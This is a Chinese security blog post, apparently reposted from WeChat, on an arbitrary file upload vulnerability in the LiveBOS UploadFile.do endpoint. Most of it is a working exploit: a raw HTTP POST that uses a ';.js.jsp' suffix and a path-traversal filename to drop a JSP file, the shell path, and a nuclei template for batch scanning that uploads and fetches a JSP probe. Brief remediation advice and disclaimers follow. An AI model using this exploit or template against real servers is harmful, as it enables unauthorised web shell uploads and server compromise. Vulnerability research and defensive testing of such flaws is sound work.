LiveBOS UploadFile.do任意文件上传漏洞

admin

140350
文章

117
评论

2024年8月2日15:30:13评论67 views字数 2418阅读8分3秒阅读模式

免责声明

请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，作者不为此承担任何责任。工具来自网络，安全性自测，如有侵权请联系删除。

0x01漏洞描述

LiveBOS接口UploadFile.do存在任意文件上传漏洞，攻击者可通过此漏洞上传恶意脚本文件，对服务器的正常运行造成安全威胁！

LiveBOS UploadFile.do任意文件上传漏洞

0x02 漏洞复现

POC如下所示：

POST /feed/UploadFile.do;.js.jsp HTTP/1.1 Host: xx.xx.xx.xxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxiConnection: close---WebKitFormBoundaryxegqoxxiContent-Disposition:form-data; name="file"; filename="/../../../../cxcq.jsp"Content-Type: image/jpeg马儿---WebKitFormBoundaryxegqoxxi--

shell地址：http://ip/rce.jsp;.js.jsp

LiveBOS UploadFile.do任意文件上传漏洞

nuclei批量脚本：id: livebos_upload_rceinfo:  name: livebos_upload_rce  author: recjl  severity: high  description: description  reference:    - https://  tags: tagshttp:  - raw:      - |-        POST /feed/UploadFile.do;.js.jsp HTTP/1.1        Host: {{Hostname}}        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0        Content-Length: 344        Connection: close        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxegqoxxi        Accept-Encoding: gzip        ------WebKitFormBoundaryxegqoxxi        Content-Disposition: form-data; name="file"; filename="/../../../../cxcq.jsp"        Content-Type: image/jpeg        <%@ page import="java.io.File" %>        <%         out.println("66666");         String filePath = application.getRealPath(request.getServletPath());         new File(filePath).delete();        %>        ------WebKitFormBoundaryxegqoxxi--      - |+        GET /cxcq.jsp;.js.jsp HTTP/1.1        Host: {{Hostname}}        Cache-Control: max-age=0        Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120"        Sec-Ch-Ua-Mobile: ?0        Sec-Ch-Ua-Platform: "Windows"        Upgrade-Insecure-Requests: 1        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7        Sec-Fetch-Site: none        Sec-Fetch-Mode: navigate        Sec-Fetch-User: ?1        Sec-Fetch-Dest: document        Accept-Encoding: gzip, deflate, br        Accept-Language: zh-CN,zh;q=0.9        Connection: keep-alive    matchers-condition: and    matchers:      - type: word        part: body        words:          - '66666'      - type: word        part: header        words:          - HTTP/1.1 200 OK

脚本执行结果：

LiveBOS UploadFile.do任意文件上传漏洞

　　修复建议：　　1、对上传文件类型进行验证，除在前端验证外在后端依然要做验证，后端可以进行扩展名检测，重命名文件，MIME类型检测以及限制上传文件的大小等限制来防御，或是将上传的文件其他文件存储服务器中。　　2、严格限制和校验上传的文件，禁止上传恶意代码的文件。同时限制相关上传文件目录的执行权限，防止木马执行。　　3、对上传文件格式进行严格校验，防止上传恶意脚本文件；　　4、严格限制上传的文件路径。　　5、文件扩展名服务端白名单校验。　　6、文件内容服务端校验。　　7、上传文件重命名。　　8、隐藏上传文件路径。

END

点击蓝字关注我们

原文始发于微信公众号（爱喝酒烫头的曹操）：LiveBOS UploadFile.do任意文件上传漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

LiveBOS UploadFile.do任意文件上传漏洞

漏洞复现 || XWiki Platform系统远程代码执行 POC

用友NC files 反序列化RCE

【高危漏洞预警】Elastic Kibana需授权代码注入漏洞 (CVE-2025-25014)

CVE-2025-2905（CVSS 9.1）：WSO2 API 管理器中发现严重 XXE 漏洞

【风险通告】Elastic Kibana存在原型污染致任意代码执行漏洞（CVE-2025-25014）

Kibana 原型污染导致执行任意代码漏洞（CVE-2025-25014）

CVE-2025-24071：通过 RAR/ZIP 提取和 .library-ms 文件泄露 NTLM 哈希值

Kibana 原型污染导致执行任意代码漏洞（CVE-2025-25014）

WordPress depicter插件SQL注入漏洞（CVE-2025-2011）

Kibana 原型污染导致任意代码执行漏洞 (CVE-2025-25014)

发表评论

在线咨询

微信